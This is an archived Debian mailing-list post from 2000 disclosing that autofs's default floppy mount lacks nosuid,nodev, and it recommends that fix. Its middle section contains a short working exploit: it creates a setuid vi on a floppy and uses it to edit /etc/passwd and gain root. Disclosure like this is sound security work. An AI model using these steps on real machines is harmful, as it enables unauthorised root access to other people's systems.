SECURITY PROBLEM: autofs [all versions]

To: Debian Devel List <debian-devel@lists.debian.org>, debian-security@lists.debian.org
Subject: SECURITY PROBLEM: autofs [all versions]
From: "Christopher W. Curtis" <ccurtis@aet-usa.com>
Date: Fri, 30 Jun 2000 20:52:23 -0400
Message-id: <[🔎] 395D40C7.576B8AC8@aet-usa.com>

I'm obviously doing something wrong ...

I've written to the maintainer of the autofs package according to the
page summary listed under 'packages' from the website, and as I also saw
somewhere else (dpkg -s listing?).  I filed a bug report against autofs
and marked it as release critical.  I have heard nothing for the past
two (three?) days and need to make this known:

There is a severe security problem for all debian machines running any
version of autofs and having a floppy drive available as /dev/fd0.  The
options listed in /etc/auto.misc fail to include the options
"nosuid,nodev" and as such anyone with a floppy disk and physical access
to a floppy drive may become root on that machine.

Here is the 'sploit:

# superformat /dev/fd0u1440
# mke2fs /dev/fd0
# cp /usr/bin/vi /var/autofs/floppy
# chmod u+s /var/autofs/floppy/vi
# umount /var/autofs/floppy

[sneakernet to victim]

% /var/autofs/floppy/vi /etc/passwd
:wq!

% telnet localhost

[...]

Well, you get the idea.  All user-modifiable filesystems must be mounted
nosuid,nodev or the systems that trust them can be trivially
compromised.  Besides floppy, this also includes the 'removable'
/dev/hdd, and possibly the CD-ROM as well.

regards,
Christopher

Reply to:

Follow-Ups:
- Re: SECURITY PROBLEM: autofs [all versions]
  - From: Adam Heath <adam@doogie.org>
- Re: SECURITY PROBLEM: autofs [all versions]
  - From: Alvin Oga <aoga@Mail.Linux-Consulting.com>

Prev by Date: Re: Libsafe
Next by Date: Re: SECURITY PROBLEM: autofs [all versions]
Previous by thread: Re: Libsafe
Next by thread: Re: SECURITY PROBLEM: autofs [all versions]
Index(es):
- Date
- Thread